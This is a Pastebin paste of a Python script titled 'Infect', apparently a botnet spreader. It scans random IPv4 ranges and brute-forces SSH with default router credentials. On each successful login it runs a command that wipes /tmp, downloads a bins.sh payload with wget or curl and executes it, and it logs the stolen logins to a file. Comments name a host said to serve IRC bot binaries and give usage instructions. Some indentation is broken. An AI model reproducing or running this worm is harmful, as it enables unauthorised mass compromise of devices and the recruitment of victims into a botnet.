API tools faq
paste
Advertisement
miraip0ts

Infect

miraip0ts
Jan 18th, 2017
839
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 7.40 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. #
  3. #-Put the files in your htdocs directory of a server to host them named something sensible like kaiten-*, wildcard in place of the architecture name.
  4. # Set some stuff on your servers so you don't get capped at 476 open SSH connections.
  5. #-ulimit -n 99999
  6. #-sysctl -w fs.file-max=100000
  7. # Run heavyhidra
  8. #-python infect.py 376 LUCKY x 0
  9. #-python infect.py 376 B 113.53 1
  10.  
  11.  
  12. import threading, paramiko, random, socket, time, sys
  13.  
  14. paramiko.util.log_to_file("/dev/null") #Prevents paramiko error spam.
  15.  
  16. files = [ #Files in which we would like to execute upon the routers.
  17.     "bins.sh",
  18.  
  19.  
  20. ]
  21.  
  22. website = "192.227.170.67" #Public facing IP hosting the IRC bot binaries.
  23.  
  24. reservedips = [ #Majestic list of reserved IP's we have no reason to scan. Actually quite dull.
  25.  'http://127.',
  26.  'http://0',
  27.  'http://10.',
  28.  'http://100.64',
  29.  'http://100.65',
  30.  'http://100.66',
  31.  'http://100.67',
  32.  'http://100.68',
  33.  'http://100.69',
  34.  'http://100.70',
  35.  'http://100.71',
  36.  'http://100.72',
  37.  'http://100.73',
  38.  'http://100.74',
  39.  'http://100.75',
  40.  'http://100.76',
  41.  'http://100.77',
  42.  'http://100.78',
  43.  'http://100.79',
  44.  'http://100.80',
  45.  'http://100.81',
  46.  'http://100.82',
  47.  'http://100.83',
  48.  'http://100.84',
  49.  'http://100.85',
  50.  'http://100.86',
  51.  'http://100.87',
  52.  'http://100.88',
  53.  'http://100.89',
  54.  'http://100.90',
  55.  'http://100.91',
  56.  'http://100.92',
  57.  'http://100.93',
  58.  'http://100.94',
  59.  'http://100.95',
  60.  'http://100.96',
  61.  'http://100.97',
  62.  'http://100.98',
  63.  'http://100.99',
  64.  'http://100.100',
  65.  'http://100.101',
  66.  'http://100.102',
  67.  'http://100.103',
  68.  'http://100.104',
  69.  'http://100.105',
  70.  'http://100.106',
  71.  'http://100.107',
  72.  'http://100.108',
  73.  'http://100.109',
  74.  'http://100.110',
  75.  'http://100.111',
  76.  'http://100.112',
  77.  'http://100.113',
  78.  'http://100.114',
  79.  'http://100.115',
  80.  'http://100.116',
  81.  'http://100.117',
  82.  'http://100.118',
  83.  'http://100.119',
  84.  'http://100.120',
  85.  'http://100.121',
  86.  'http://100.122',
  87.  'http://100.123',
  88.  'http://100.124',
  89.  'http://100.125',
  90.  'http://100.126',
  91.  'http://100.127',
  92.  'http://169.254',
  93.  'http://172.16.',
  94.  'http://172.17.',
  95.  'http://172.18.',
  96.  'http://172.19.',
  97.  'http://172.20.',
  98.  'http://172.21.',
  99.  'http://172.22.',
  100.  'http://172.23.',
  101.  'http://172.24.',
  102.  'http://172.25.',
  103.  'http://172.26.',
  104.  'http://172.27.',
  105.  'http://172.28.',
  106.  'http://172.29.',
  107.  'http://172.30.',
  108.  'http://172.32.',
  109.  'http://192.0.0.0',
  110.  'http://192.0.0.1',
  111.  'http://192.0.0.2',
  112.  'http://192.0.0.3',
  113.  'http://192.0.0.4',
  114.  'http://192.0.0.5',
  115.  'http://192.0.0.6',
  116.  'http://192.0.0.7',
  117.  'http://192.0.2.',
  118.  'http://192.88.99.',
  119.  'http://192.168.',
  120.  'http://198.18.',
  121.  'http://198.19.',
  122.  'http://198.51.100.',
  123.  'http://203.0.113.',
  124.  'http://224.',
  125.  'http://225'
  126. ]
  127. lucky = ["37.237","37.238","37.239","37.236","191.53","186.208","191.53","186.208","1.0","177.137","177.38","101.108","125.27","177.44","179.189","179.97"]
  128. passwords = [ #Some default SSH logins.
  129.     "root:root",
  130.     "root:admin",
  131.     "admin:admin",
  132.     "ubnt:ubnt"
  133. ]
  134.  
  135. print sys.argv[0]+' Threads[max 376] A/B/C(ip class) /RAND IPHERE(1/1.1/1.1.1) 0/1 (password list, root:root) (doesn\'t scan recursively)' #Lack of basic system arguments/coded two years ago. Don't hate.
  136.  
  137. if sys.argv[4] == '1':
  138.     passwords = [ "root:root", "admin:1234" ] #Faster exploitation with somewhat less results.
  139.  
  140. ipclassinfo = sys.argv[2]
  141. if ipclassinfo == "A":
  142.     ip1 = sys.argv[3]
  143. elif ipclassinfo == "B":
  144.     ip1 = sys.argv[3].split(".")[0]
  145.     ip2 = sys.argv[3].split(".")[1]
  146. elif ipclassinfo == "C":
  147.     ips = sys.argv[3].split(".")
  148.     num=0
  149.     for ip in ips:
  150.         num=num+1
  151.         if num == 1:
  152.             ip1 = ip
  153.         elif num == 2:
  154.             ip2 = ip
  155.         elif num == 3:
  156.             ip3 = ip
  157. class sshscanner(threading.Thread):
  158.     global passwords
  159.     global ipclassinfo
  160.     if ipclassinfo == "A":
  161.         global ip1
  162.     elif ipclassinfo == "B":
  163.         global ip1
  164.         global ip2
  165.     elif ipclassinfo == "C":
  166.         global ip1
  167.         global ip2
  168.         global ip3
  169.     def run(self):
  170.         while 1:
  171.             try:
  172.                 while 1:
  173.                     thisipisbad='no'
  174.                     if ipclassinfo == "A":
  175.                         self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  176.                     elif ipclassinfo == "B":
  177.                         self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  178.                     elif ipclassinfo == "C":
  179.                         self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  180.                     elif ipclassinfo == "LUCKY":
  181.                         self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  182.                     else:
  183.                         self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  184.                     for badip in reservedips:
  185.                         if badip in self.host:
  186.                             thisipisbad='yes'
  187.                     if thisipisbad=='no':
  188.                         break
  189.                 self.host=self.host.replace('http://', '') #This could be optimized. This is bad code. No idea why I did it like this.
  190.                 username='root'
  191.                 password="0"
  192.                 port = 22
  193.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  194.                 s.settimeout(3)
  195.                 s.connect((self.host, port))
  196.                 s.close()
  197.                 ssh = paramiko.SSHClient()
  198.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  199.                 dobreak=False
  200.                 for passwd in passwords:
  201.                     if ":n/a" in passwd:
  202.                         password=""
  203.                     else:
  204.                         password=passwd.split(":")[1]
  205.                     if "n/a:" in passwd:
  206.                         username=""
  207.                     else:
  208.                         username=passwd.split(":")[0]
  209.                     try:
  210.                         ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  211.                         dobreak=True
  212.                         break
  213.                     except:
  214.                         pass
  215.                     if True == dobreak:
  216.                         break
  217.                 badserver=True
  218.                 stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  219.                 output = stdout.read()
  220.                 if "inet addr" in output:
  221.                     badserver=False
  222.                 websites = [ ]        
  223.                 if badserver == False:
  224.                         print 'Infected: '+username+'<'+password+'>'+self.host+'|'+str(port)
  225.                         ssh.exec_command("cd /tmp && rm -rf *; wget http://1.1.1.1.1/bins.sh || curl -O http://1.1.1.1.1/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh")
  226.             infectedip = open("vuln.txt","a").write(username+":"+password+":"+self.host+"\n")
  227.                         time.sleep(30)
  228.             ssh.close()
  229.             except:
  230.                 pass
  231.  
  232. for x in range(0,int(sys.argv[1])): #This may abuse your system resources and anger network administrators.
  233.     try:
  234.         t = sshscanner()
  235.         t.start()
  236.     except:
  237.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!